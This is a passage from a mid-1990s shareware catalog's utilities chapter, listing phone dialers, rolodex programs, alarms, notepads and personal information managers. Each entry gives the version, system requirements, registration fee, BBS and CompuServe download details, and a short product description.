thresholds are exceeded. Real-time counters are + displayed like odometers. Reports show profiles of user input + activity. On-line help provided. Dynamic Link Library can be + used by your own programs. + + + Product: Drag 'n' Drop Utils for Win NT + Utils for NT: clocks, wallpaper, recycler, &c. See full + description on page 119. + + Product: Personal Calendar (PC) for DOS + TSR PIM appointment reminder, clock, calendar. See full + description on page 144. + + Product: SmilerShell + Windows cmdline, control center, launcher. See full + description on page 179. + + Product: Visual Calendar Planner + A desktop planner similar to office planner. See full + description on page 145. + + Product: XFile + Multifunction desktop utility for Windows. See full + description on page 121. + + 2.6.4.1 Precision timers + + Product: TC's Toolbox + Nine Windows programs, view files & lots more. See full + description on page 57. + + Chapter 2, "Utilities" 128 + + + + 2.6.5 Phone dialers + + See also: Communications, Call logging & analysis. + + Product: Above & Beyond + PIM for planning, managing your time. See full description on + page 137. + + Product: Contact Browser + Author: , 619-672-1479 + Version: 2.5b (08-25-95) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; VGA monitor; + Hard disk; XMS memory. + Strongly recommended: SVGA monitor; HP DeskJet printer; HP + LaserJet printer; Hayes-compatible modem; Mouse; Epson printer. + Registration fee: $29.95 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; 3-month limited return policy; site + license; all ASP-wide offers (see page 5); discounts on + upgrades. + Look for: availability unknown on BBSs; PHONE.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 12 (or contact userID 72774,3705 + for assistance). + SWREG#: 5066 + Download size: 1277k (about 95 minutes with a 2400 baud modem) + Description: + Can be used at home or for business. Includes fields for names, + addresses, six phone numbers, special dates, E-Mail ID's, and + comments. Uses categories for grouping contacts for reports and + label printing. Unlimited number of entries, automatically + sorted. Searching, modem dialing, full featured customizable + reports and label printing, import/export, call histories, OLE + 2.0 and E-Mail capabilities. + + + Product: Easydial + Author: , 909-352-2820 + Version: 4.5 (01-22-93) + Needs: IBM PC, DOS 2.0 or better. CGA monitor; Hercules monitor; + Hard disk; Modem. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s); 3 months of BBS + support. 1-month return policy. + Look for: ED45.ZIP on BBSs (call 909-352-2825 to download it at + no charge); ED45.ZIP on CompuServe in CIS:PCCOM forum LIBrary 2 + (or contact userID 76347,2477 for assistance); ED45.ZIP on + + Chapter 2, "Utilities" 129 + + + + GEnie in IBMPC-615 forum LIBrary 6 (or contact userID PATRISOFT + for assistance). + Download size: 74k (about six minutes with a 2400 baud modem) + Description: + Dial your phone with your modem quickly and easily. Quick to + master; one of the best dialers available. You may log and time + calls, make difficult credit card calls, and even ignore a + certain area code. Great for turning call forwarding on/off, + contacting pagers and more! The dialer that you have been + looking for! + + + Product: Folders + Personal information manager network email. See full + description on page 142. + + Product: HDM - Hard Disk Menu + DOS menu & security system, network support. See full + description on page 155. + + Product: Link + Connects program to callback service. See full description on + page 371. + + Product: Little Black Book + Author: , 201-635-1824 + Version: 3.0 (10-25-94) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; + VBRUN300.DLL. + Strongly recommended: Modem; Mouse. + Registration fee: $19.00 (add $3.95 for shipping to U.S. + addresses) (add $3.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, CompuServe support; all ASP-wide offers (see + page 5). Lifetime free upgrading allowed. + Look for: LBB.ZIP on BBSs (call 201-886-8048 to download it at no + charge); LBB.ZIP on CompuServe in CIS:PCAPP forum LIBrary 7 (or + contact userID 76336,3271 for assistance). + SWREG#: 3202 + PsL#: 11661 + Download size: 720k (about 54 minutes with a 2400 baud modem) + Description: + A popular favorite. It allows users to store names, addresses, + phone numbers, and up to 64K of notes per record. Includes + print and print-preview features as well as a full-featured on- + line context sensitive Windows help system. Also has an + intuitive toolbar interface in addition to the standard menu + structure interface. Data is created in MS-Access 2.0 format + for easy portability to other popular applications. + + Chapter 2, "Utilities" 130 + + + + Product: Money Organizer + Manages unlimited number of accounts, budget. See full + description on page 347. + + Product: NAMEBASE + Name/address/notes database w/mouse support. See full + description on page 306. + + Product: PCFDial + Author: , 618-632-7345 + Version: 1.05 (05-26-92) + Needs: IBM PC, DOS 2.0 or better. 7k RAM; Hard disk; Hayes- + compatible modem. + Registration fee: $19.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); 12 months of unlimited + phone, fax, CompuServe, newsletter, mail support; 1-month + return policy; all ASP-wide offers (see page 5); discounts on + other products. + Look for: PCFD-105.ZIP on BBSs (call 618-632-2339 to download it + at no charge); PCFDIL.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 7 (or contact userID 74017,1344 for assistance); + PCFD-103.ZIP on GEnie in IBMPC forum LIBrary 0 (or contact + userID R.ROSENBERGE for assistance). + SWREG#: 835 + PsL#: 10362 + Download size: 150k (about eleven minutes with a 2400 baud modem) + Awards & nominations: 1991 winner, Public Brand Software + contests for useful programs. + Description: + This 7k swapping TSR dials voice phone numbers displayed by + other programs (such as database software). Can dial "vanity" + numbers like 800-IBM-DISK or numbers split apart on separate + lines. Keeps a log of calls and displays the local time for + each area code. Pops up at regular intervals to let you know + how long you've talked (useful for salesmen who must "close the + deal" in a set amount of time). Context sensitive help. + + + Product: TC's Toolbox + Nine Windows programs, view files & lots more. See full + description on page 57. + + Chapter 2, "Utilities" 131 + + + + Product: VB-Dial + Author: , 310-866-1932 + Version: 2.1c (11-05-93) + Needs: IBM 80386, Windows 3.0 or better. 640k RAM; VGA monitor; + Hard disk; Hayes-compatible modem; Mouse; sound card. + Registration fee: $25.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 1 + months of phone, BBS, CompuServe, mail support. + Look for: VBDIAL_A.ZIP on BBSs (multiple files) (call + 310-864-3062 to download it at no charge); VBDIAL.ZIP on + CompuServe in CIS:IBMCOMM forum LIBrary 4 (multiple files) (or + contact userID 70322,211 for assistance). + Download size: 491k (about 37 minutes with a 2400 baud modem) + Description: + The first multimedia dialer out! A phone-dialer & basic + communications package for Windows 3.x. Has a "NeXT-like" 3D + control panel. Names & numbers displayed in a scrollable pick- + list, with a "smartkeys" speedsearch. Dial to talk, or for BBS. + Has full ANSI colors, backscroll, Zmodem, macros, session-logs + & more! Shortcut keys emulate Telix. Supports up to 19200 + baud. Reads & edits SideKick or any ASCII datafile. Online + help. Customize colors & fonts. + + + 2.6.5.1 Rolodex programs + + Product: Calling Cards + Author: , 201-529-8318 + Version: 3.3 (09-05-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; 3-month + return policy; bonus utilities; discounts on other products. + Look for: availability unknown on BBSs; MLRCC.ZIP on CompuServe + in CIS:ASPCD forum LIBrary 0 (or contact userID 70761,2175 for + assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Keeps all of your names and numbers at your fingertips. Need + your plumber fast... but can't recall a name or company? Just + tell Calling Cards to find your plumber. You can print bulk + labels, single labels, and categories of labels. Also prints + Rolodex cards, envelopes and checklists. Checklists are great + for keeping track of who responds to the RSVP invitations that + you send out for weddings, client queries, parties, etc. + + Chapter 2, "Utilities" 132 + + + + Product: THE CALLING TREE + Calling tree database manager. See full description on + page 315. + + Product: Contact Manager + Author: , 702-329-6868 + Version: 2.21 (10-12-94) + Needs: IBM AT (80286), DOS 3.3 or better. 640k RAM. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $7.50 for shipping to Canadian addresses) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs. + Download size: 315k (about 24 minutes with a 2400 baud modem) + Description: + Helps you manage names, phone numbers, and information, for + your contacts. You can print mail labels and Rolodex type pin + fed cards. + + + Product: FF Business Cards + Author: , 407-951-2268 + Version: 1.0 (12-08-94) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + HP DeskJet printer; HP LaserJet printer; Postscript printer; + Mouse. Laser printer capable of single-sheet feeds. + Registration fee: $19.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; bonus + utilities; bonus graphics; all ASP-wide offers (see page 5); + disks of other shareware; discounts on other products. + Look for: FFBCRD.ZIP on BBSs; FFBCRD.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 7 (or contact userID 72103,505 for + assistance). + Download size: 349k (about 26 minutes with a 2400 baud modem) + Description: + Features a "drag and drop" interface allowing you to create + stunning business and rotary (rolodex) cards and then print + them on your printer. You can place text, pictures, lines and + rectangles. Use all your fonts and bitmaps! Links to + Paintbrush to edit/create picture images. Many examples + included to get you started quickly. Use it to print coupons, + appointment cards, tickets, anything you would want to print on + a card! + + Chapter 2, "Utilities" 133 + + + + Product: FONEFILE + Author: , 909-354-5251 + Version: 5.0a (10-01-93) + Needs: IBM PC, DOS 3.0 or better. 5k RAM; Hard disk. + Strongly recommended: EMS memory. + Registration fee: $19.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; 3-month return policy; all ASP-wide offers (see + page 5); disks of other shareware. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; FONEFL.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 9 (or contact userID 76636,2764 for + assistance). + Download size: 91k (about seven minutes with a 2400 baud modem) + Description: + A full featured name and address database. Optional TSR feature + allows pop-Up access to your names without leaving your current + DOS programs. Names automatically sorted by last name and + never needs re-indexing. Ample room to enter full address, 2 + telephone numbers and 2 comment lines. Optional 'default' value + fields makes data entry fast and easy. Prints reports, labels, + Rolodex(r) cards, and post cards. Creates 'mail-merge'. Mouse + support for added ease of use. + + + Product: ListBuilder + Contact manager for building a Network. See full description + on page 143. + + Product: PopDBF + 4k TSR for "instant access to X-Base files" See full + description on page 248. + + Product: Rolodeck [***] + Author: , 804-823-6896 + Version: 1.0 (05-03-95) + Needs: IBM AT (80286), Windows 3.1 or better. 70k RAM. + Strongly recommended: VGA monitor; Hard disk; Mouse. + Registration fee: $8.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + mail support; lifetime return policy; all ASP-wide offers (see + page 5); discounts on upgrades. + Look for: availability unknown on BBSs; ROLO10.ZIP on CompuServe + in CIS:WINSHAR forum LIBrary 0 (or contact userID 72176,2507 + for assistance). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Puts your desktop rolodex into Windows. Alphabet bar allows + quick access through out your file. Page curls allow changing + pages by clicking the mouse. + + Chapter 2, "Utilities" 134 + + + + Product: TC's Personal Data Manager + Keep track of addresses and phone numbers. See full + description on page 145. + + Product: x-CON3 + Network contacts management system. See full description on + page 378. + + Product: x-FONE3 + Network phone directory system. See full description on + page 379. + + Product: x-FONE4 + Network phone directory system for Windows. See full + description on page 380. + + 2.6.6 Alarms + + Product: Above & Beyond + PIM for planning, managing your time. See full description on + page 137. + + Product: Ample Notice + Very flexible appointment scheduler/alarm. See full + description on page 123. + + Product: Clickometer + Warns when keybd/mouse activity exceed limits. See full + description on page 127. + + Product: DDKEY + Powerful 7.5K TSR key redefinition utility. See full + description on page 63. + + Product: DR. Memory + Author: + Version: 3.3 (01-09-94) + Needs: IBM PC, DOS 3.3 or better. 250k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: EGA monitor; Hard disk. + Registration fee: $0.00 + Registration benefits: lifetime BBS, CompuServe, mail support; + all ASP-wide offers (see page 5). + Look for: DRM33.ZIP on BBSs (call 513-274-0821 to download it at + no charge); DRM33.ZIP on CompuServe in CIS:PCUTIL forum LIBrary + 7 (or contact userID 71001,1370 for assistance). + Download size: 135k (about ten minutes with a 2400 baud modem) + Description: + yet another of the many "E-Z to use reminder" programs written + over the past few years that remind you of appointments, + holidays, etc. Has the good features of the others, yet none + of the complexity and complication, and is easy and quick to + use. User's Manual is included. Try it, you'll love it! + + Chapter 2, "Utilities" 135 + + + + Product: Early Bird + Early Bird. See full description on page 147. + + Product: Personal Calendar (PC) for DOS + TSR PIM appointment reminder, clock, calendar. See full + description on page 144. + + Product: XFile + Multifunction desktop utility for Windows. See full + description on page 121. + + 2.6.7 ASCII charts + + Product: DDKEY + Powerful 7.5K TSR key redefinition utility. See full + description on page 63. + + 2.6.8 Notepads + + Product: BOXER/DOS Text Editor + Full-featured text editor/word processor. See full description + on page 185. + + Product: BOXER/OS2 Text Editor + Full-featured text editor/word processor. See full description + on page 185. + + Product: BusinessCards for Windows + Free form database for Windows. See full description on + page 138. + + Product: ClipMate for Windows + Clipboard utility - holds multiple items. See full description + on page 175. + + Product: CODE-A-LINE + Outline processor, text editor, printing util. See full + description on page 192. + + Product: Contact-Lens! + Extremely fast contact manager/PIM. See full description on + page 140. + + Product: HOLD-ANYTHING! + Keeps track of any kind of data very easily! See full + description on page 243. + + Product: MEGA EDIT Editor for Windows + Text editor for large files. See full description on page 187. + + Chapter 2, "Utilities" 136 + + + + Product: Postit for Windows [***] + Author: , 804-823-6896 + Version: 3.0 (06-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $10.00 (add $2.95 for shipping to U.S. + addresses) (add $2.95 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + mail support; lifetime return policy; all ASP-wide offers (see + page 5). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; POSTIT30.ZIP on + CompuServe in CIS:WINSHARE forum LIBrary 0 (or contact userID + 72176,2507 for assistance). + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + A Windows 3.1 popup note pad for making quick notes. Now has + more of a Windows touch and feel with variable size page and + note size. Includes a speed bar. Does not require the user to + load or store files and is capable of 10 pages with up to 32000 + characters each. This is the computer version of the yellow + sticky notes all over your desk. Many other features. + + + Product: Rolodeck [***] + A Windows based business card file. See full description on + page 133. + + Product: TC's Personal Data Manager + Keep track of addresses and phone numbers. See full + description on page 145. + + Product: TC's Toolbox + Nine Windows programs, view files & lots more. See full + description on page 57. + + Product: WinJottr + Author: , 719-531-0403 + Version: 1.0 (04-10-94) + Needs: IBM AT (80286), Windows 3.1 or better. 512k RAM; VGA + monitor; Hard disk; VBRUN300.DLL. + Strongly recommended: Mouse. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of CompuServe, mail support; lifetime return policy; + bonus utilities; all ASP-wide offers (see page 5); disks of + + Chapter 2, "Utilities" 137 + + + + other shareware; discounts on upgrades. 12-month free upgrading + allowed. + Look for: JOTTR_10.ZIP on BBSs (call 703-680-9269 to download it + at no charge); JOTTR.ZIP on CompuServe in CIS:WINUTIL forum + LIBrary 18 (or contact userID 75236,3243 for assistance). + Download size: 94k (about seven minutes with a 2400 baud modem) + Description: + Different! Designed exclusivesly to streamline your notetaking. + Easy to use; position anywhere - uses less than 10% of an SVGA + screen. Short-cut keys for DateStamp functions and all standard + Windows edit commands. AutoSave and AlwaysOnTop capabilities + make this the ideal desktop companion for the busy computer + user. Searchable, 30k capacity is ideal for holding a month or + more of that important random data. + + + 2.6.9 Personal information managers (PIMs) + + Product: 2DO Personal Task Manager + Author: , 206-828-3675 + Version: 1.2 (06-01-94) + Needs: IBM PC, Windows 3.0 or better. VGA monitor; Hard disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Postscript printer; Hayes-compatible modem; Mouse; sound card. + Registration fee: $30.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; bonus + utilities; discounts on other products; discounts on upgrades. + Look for: availability unknown on BBSs; 2DOV12.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 12 (or contact userID 71662,545 + for assistance). + SWREG#: 1313 + PsL#: 10948 + Download size: 413k (about 31 minutes with a 2400 baud modem) + Description: + A personal task manager for Windows, allowing you to organize, + schedule, and view your To Do List of tasks through a robust + drag and drop interface. Works with tasks, not times, so it + works more the way you do. Windows Sources says it "provides + users with task-management solutions that are unequaled by any + commercial PIM I've seen". Software Creations calls it a + "powerful PIM, with considerable depth, and the interface is + intuitive and user friendly." + + Chapter 2, "Utilities" 138 + + + + Product: Above & Beyond + Author: , 707-987-0256 + Version: 3.1 (06-09-94) + Needs: IBM AT (80286), Windows 3.0 or better. + Registration fee: $99.00 (add $5.00 for shipping to Canadian + addresses) (add $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + all ASP-wide offers (see page 5). + Look for: ABOVE31.ZIP on BBSs (call 707-987-9580 to download it + at no charge); AB.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 12 (or contact userID 71240,1625 for assistance); + AB.ZIP on GEnie in IBMPC forum LIBrary 0. + SWREG#: 405 + Download size: 270k (about 20 minutes with a 2400 baud modem) + Awards & nominations: 1994 winner, Shareware Industry Awards. + Description: + A powerful Windows PIM for managing your busy schedule. Its + unique dynamic scheduling makes planning your work and staying + organized quick and easy. Daily, weekly and monthly views. + Handles all types of recurring items. Timers, pop-up calendars, + alarms, etc. All completed items are logged. There's a contact + manager for addresses and phone numbers with auto-dialing and + notes space. You can even schedule programs to execute + automatically. Built-in LAN support for group scheduling. + + + Product: Around The House + Author: , 317-782-9903 + Version: 2.02 (06-26-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, BBS, CompuServe, mail support; + 1-month return policy; bonus utilities; all ASP-wide offers + (see page 5); disks of other shareware; discounts on other + products. 1 free update disk(s) sent out. + Look for: ATH202.ZIP on BBSs (call 317-784-2147 to download it at + no charge); ATH.ZIP on CompuServe in CIS:PCAPP forum LIBrary 7 + (or contact userID 73567,1547 for assistance). + SWREG#: 1594 + Download size: 420k (about 31 minutes with a 2400 baud modem) + Description: + Complete household information manager. Maintain names, + addresses, phone numbers, birthdays, Christmas card lists, etc. + Print mailing labels from database. Track home inventory, + model/serial numbers, location, value. Keep notes, from recipes + to a personal diary. Track auto repair and maintenance. Shows + income, expenses, and "what's left". Many pre-defined reports; + allows user-defined reports. Has an appointment calendar and + basic "word processor" for mail-merge letters. Context- + sensitive help. + + Chapter 2, "Utilities" 139 + + + + Product: BusinessCards for Windows + Author: , 415-588-6215 + Version: v2.01 (05-10-94) + Needs: IBM AT (80286), Windows 3.1 or better. 1k RAM; VGA + monitor. + Registration fee: $19.95 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; bonus utilities; + bonus data; all ASP-wide offers (see page 5); discounts on + upgrades. + Look for: availability unknown on BBSs; BCARD*.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 0 (or contact userID 73773,2527 + for assistance). + SWREG#: 2483 + PsL#: 11305 + Download size: 140k (about eleven minutes with a 2400 baud modem) + Description: + Powerful, compact and easy to use free form database program + for Windows. There are no predefined forms or record layouts - + you decide how to store and present data. Elegant folio like + user interface with tabs and flipping pages. Reads/writes + Windows Cardfile files. Data exchange with most personal + databases Guaranteed to put you into productivity within + minutes! + + + Product: ChronoLog + Author: , 804-458-2212 + Version: 1.11 (09-15-93) + Needs: IBM PC, DOS 2.11 or better. 256k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives; Hard disk; HP + DeskJet printer; HP LaserJet printer; Hayes-compatible modem. + Registration fee: $35.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; 12-month return policy; site license; all ASP-wide + offers (see page 5). + Look for: CHRON111.ZIP on BBSs; CHRON1.ZIP on CompuServe in + CIS:IBMAPPS forum LIBrary 6 (or contact userID 71221,2766 for + assistance); CHRON111.ZIP on GEnie in IBMPC forum LIBrary 15. + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + A personal information/resource management system for DOS. + Features easy entry of eleven event types, reminding, logging/ + recall by category, quick searching, resource utilization and + conflict-checking, printing of appointment schedules and + monthly block calendars on any printer, export/import, phone + directory with autodial, calculator, todo list, DOS shell. This + system won the 1991 Dept of Defense Software Contest and has + been much improved. Extremely easy to use. + + Chapter 2, "Utilities" 140 + + + + Product: Contact Browser + Contact manger/phone dialer. See full description on page 128. + + Product: Contact Manager + Manage contact names & phone numbers. See full description on + page 132. + + Product: Contact-Lens! + Author: , 201-670-0677 + Version: 2.3 (04-15-94) + Needs: IBM PC, DOS 3.2 or better. 450k RAM; CGA monitor; Hard + disk. + Strongly recommended: VGA monitor; HP LaserJet printer; Mouse. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities; all ASP-wide offers (see page 5); + disks of other shareware; discounts on other products; + discounts on upgrades. + Look for: availability unknown on BBSs; CL.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 7 (or contact userID 70324,1034 for + assistance). + PsL#: 11026 + Download size: 410k (about 31 minutes with a 2400 baud modem) + Description: + Fast Personal Information Manager (PIM) runs under DOS/Windows, + icon included: 7 screens/contact, 22 search fields, context- + sensitive help windows & online manual, flexible import/export + program. + + + Product: DARN! Don't Forget! + Author: , 607-533-4685 + Version: 4.00 (05-31-95) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $39.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of phone, BBS, CompuServe, newsletter, mail support; + 1-month limited return policy; bonus utilities; bonus data; all + ASP-wide offers (see page 5); discounts on upgrades. + Look for: DARNW40.ZIP on BBSs (call 607-533-7072 to download it + at no charge); DARNW40.ZI on CompuServe in CIS:PCUTIL forum + LIBrary 7 (or contact userID 71333,1577 for assistance). + Download size: 463k (about 35 minutes with a 2400 baud modem) + Description: + Did you forget the Boss's birthday? Your Mom's anniversary? + Darn! reminds you of all your important events every day. You + set it for the number of days to look ahead so you'll have + plenty of time to buy gifts and cards. Handles 7 kinds of + events including annual, monthly, bi-monthly, weekly, every- + + Chapter 2, "Utilities" 141 + + + + other-weekly, x day of y month, and appointments. Includes a + special holiday data base and recommends anniversary gifts. + Prints the events list. + + + Product: Day By Day + Author: , 201-635-1824 + Version: 1.3 (05-05-95) + Needs: IBM PC, DOS 3.3 or better. 4000k RAM; Hard disk; Mouse; + XMS memory; VBRUN300.DLL. + Strongly recommended: VGA monitor. + Registration fee: $19.95 (add $3.95 for shipping to U.S. + addresses) (add $3.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, CompuServe, mail support; all ASP-wide offers + (see page 5). Lifetime free upgrading allowed. + Look for: DBD13.ZIP on BBSs; DBD.ZIP on CompuServe in CIS:WINAPD + forum LIBrary 1 (or contact userID 76336,3271 for assistance). + SWREG#: 3923 + PsL#: 11688 + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + A full featured PIM, including scheduler, task list manager, + and diary sections. All data is password protected. Create + master task list to allow for easy entry of recurring tasks and + default scheduling on a weekly basis. Diary section includes + text search feature, allowing you to view all journal entries + pertaining to specific person, place, event, etc., and allows + for up to 64k of notes per day. Includes full on-line, context + sensitive Windows Help system. + + + Product: DayMaster + Author: , 816-429-3558 + Version: 4.10 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. + Strongly recommended: Hard disk; Mouse. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 5); disks of other shareware; discounts on other products. + + Chapter 2, "Utilities" 142 + + + + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: DAYM410.ZIP on BBSs (call 317-784-2147 to download it + at no charge); DAYMST.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 79 + Download size: 304k (about 23 minutes with a 2400 baud modem) + Description: + Provides user with trivia, birthdays, anniversaries for a + particular date, and allows user to include their own + information for any date. It also gives a quote for the day, + and informs user of any reminders the user might have entered. + Reminder feature works for weekly/monthly/daily/annual/single + or range of dates basis. All of this can take place at boot up + or any other time user activate the program. The permanent data + file contains over 3000 historical events and 1000 quotes. Also + BBS option. + + + Product: DR. Memory + Easy, powerful, tickler/reminder program. See full description + on page 134. + + Product: Folders + Author: , +81-3-3207-4553 + Version: 2.0 (03-22-95) + Needs: IBM AT (80286), Windows 3.1 or better. SVGA monitor; + Hayes-compatible modem; Mouse; VBRUN300.DLL. + Strongly recommended: Network (LAN); XMS memory. + Registration fee: $38.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 5). 6-month free upgrading allowed. + Look for: FOLDERS.ZIP on BBSs; FOLDERS.ZIP on GEnie in 1212 forum + LIBrary 0. + SWREG#: 4013 + PsL#: 14097 + Download size: 1000k (about 74 minutes with a 2400 baud modem) + Description: + A powerful method to keep track of both your personal and + business information. You can keep an unlimited amount of + information(address', personal information, notes, etc.). You + can also connect to your network and send email to your + associates. Comes with image viewer that allows you to view + documents as you talk on the phone. Send faxes with Winfax. + Find you appointments and clients easily with a power search + method. Print out you records and appointments with custom + prints. + + Chapter 2, "Utilities" 143 + + + + Product: HOLD-ANYTHING! + Keeps track of any kind of data very easily! See full + description on page 243. + + Product: HouseHold TRACKER + Inventory household items. See full description on page 235. + + Product: Infothek Information Manager + Author: , 610.640.0339 + Version: 1.10 (08-10-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $49.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; INFOTK.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 8 (or contact userID 76534,1166 + for assistance). + SWREG#: 6790 + Download size: 830k (about 62 minutes with a 2400 baud modem) + Description: + Complete Information Manager for business and personal use. + Popular relational database engine. Easy-to-use, intuitive, + powerful SQL-based query method. Databases can be created and + restructured in minutes. Cross-tabs, graphs, reports, labels, + merge, Code39 bar codes, POSTNET, import, export. + + + Product: ListBuilder + Author: , 609-262-1097 + Version: 1.1 (06-27-95) + Needs: IBM 80386, Windows 3.0 or better. 4000k RAM; EGA monitor; + Hard disk; Mouse. + Strongly recommended: Modem. + Registration fee: $29.00 + Registration benefits: Full program functionality; 3 months of + unlimited phone, CompuServe, mail support; lifetime return + policy; bonus utilities; bonus data; all ASP-wide offers (see + page 5); discounts on upgrades; registration commissions. + 3-month free upgrading allowed. + Look for: availability unknown on BBSs; LISTBLD1.ZIP on + CompuServe in CIS:WORK forum LIBrary 5 (or contact userID + 72074,1611 for assistance). + SWREG#: 5753 + PsL#: 11994 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Easy-to-use Contact Manager that can be customized to your + "networking" needs. Ready to use, just add your contacts! + Standard features: Demographic info, directions (to home/work), + + Chapter 2, "Utilities" 144 + + + + speed dial, calendar, personalized drop-down boxes, reports & + labels. Special features: customize your lists into catagories + you setup. Also, build a large list of names by "brainstorming" + to associate names / places / occupations with people you know. + + + Product: Little Black Book + Autodialer/'rolodex' program. See full description on + page 129. + + Product: Money Organizer + Manages unlimited number of accounts, budget. See full + description on page 347. + + Product: NAMEBASE + Name/address/notes database w/mouse support. See full + description on page 306. + + Product: Personal Calendar (PC) for DOS + Author: , 703-435-1110 + Version: 14.71 (11-18-94) + Needs: IBM PC, DOS 3.0 or better. 6k RAM; Program can run safely + on a system with no hard disk and only one floppy disk drive. + Operates with DOS 2.1 if not used as a TSR. + Strongly recommended: Hard disk; EMS memory. + Registration fee: $39.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 